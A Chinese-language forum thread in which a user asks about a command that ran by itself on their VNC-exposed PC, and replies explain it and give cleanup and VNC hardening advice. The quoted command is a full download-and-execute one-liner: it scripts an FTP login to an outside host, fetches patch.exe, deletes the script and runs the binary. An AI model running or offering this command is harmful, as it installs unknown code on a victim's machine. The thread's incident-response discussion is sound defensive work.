我被入侵了..請問它打了這些指令是什麼意思??
 

各位好

我在上網時...電腦突然就自己執行起來
動作如下

工作管理跳出來

執行新工作,指令如下

cmd /c echo open ftp.tetovaret.net 21 >> ik &echo user faraonbaba1 cufa1234 >> ik &echo binary >> ik &echo get patch.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &patch.exe &exit

然後就不見了....

請問這指令是什麼時候丫

因為我有另一台電腦是專門下載的
當然用VNC連線到下載機時
就會很常這樣

但我二台都有開防火牆 + 還有裝NOD32

是真的被入侵了嗎

那我裝的NOD32和防火牆是不是都沒有用啊....

http://www.google.com/search?q=cmd%...ovaret.net%2021

http://cyanchat.dnijazzclub.com/own...remote-desktop/

看起來像是惡作劇遠端遙控程式 :confused:

建議一些網路密碼之類的趕快換掉.

整台電腦重灌.

不覺得只是惡作劇....


另外. 這東西網路上討論的很少. 可能沒啥防毒軟體可以偵測?!

看起來很像是利用遠端在你的電腦建立了一個ik.txt檔，裡面記錄了帳號跟密碼
然後使用ftp指令利用這個檔案登入取得patch.exe後，刪除ik.txt及patch.exe後離開

看起來很像是惡作劇的感覺，不過建議你還是趕快改一下你的本機及網路密碼吧

還有加上一個 "執行 patch.exe"

不知道會對系統做什麼事情.

報警比較重要
................

直接去大本營問問看就知道了
那邊的高手有兩種，一種是是收錢防駭客的職業專家(道)
另外一種是不收錢搞破壞的業娛駭客(魔)
資安論壇： http://forum.icst.org.tw/phpbb/

講話要客氣點、問題要深入點
不要白目到讓自己變成了實驗的對像
運氣好的話說不定還可以看到黑、白兩道對嗆的討論 :laugh:
上一次是白的輸掉(論壇被攻陷)，但黑的也被請到警察局打工

去資安論壇問了大家的意見

還是重灌加上修改密碼為上策了

感謝大家的幫忙

有出現這個畫面嗎

一般來說，這通常是User電腦有裝VNC才會發生的狀況，
如果VNC密碼設得太簡單，又一時疏忽對外開放連線Port，就容易被入侵，
一旦駭客連線VNC成功，就會迅速下載木馬或病毒程式並執行它，就中獎了~
因為VNC是User自己開放的合法連線，因此防火牆跟防毒軟體都不會有作用。

所以VNC密碼請設複雜一點，最好常常更換，如無需要請關閉對外的連線Port，
僅允許區網內使用。最好也改掉預設的Port號(預設通常是5900)，這樣會安全些。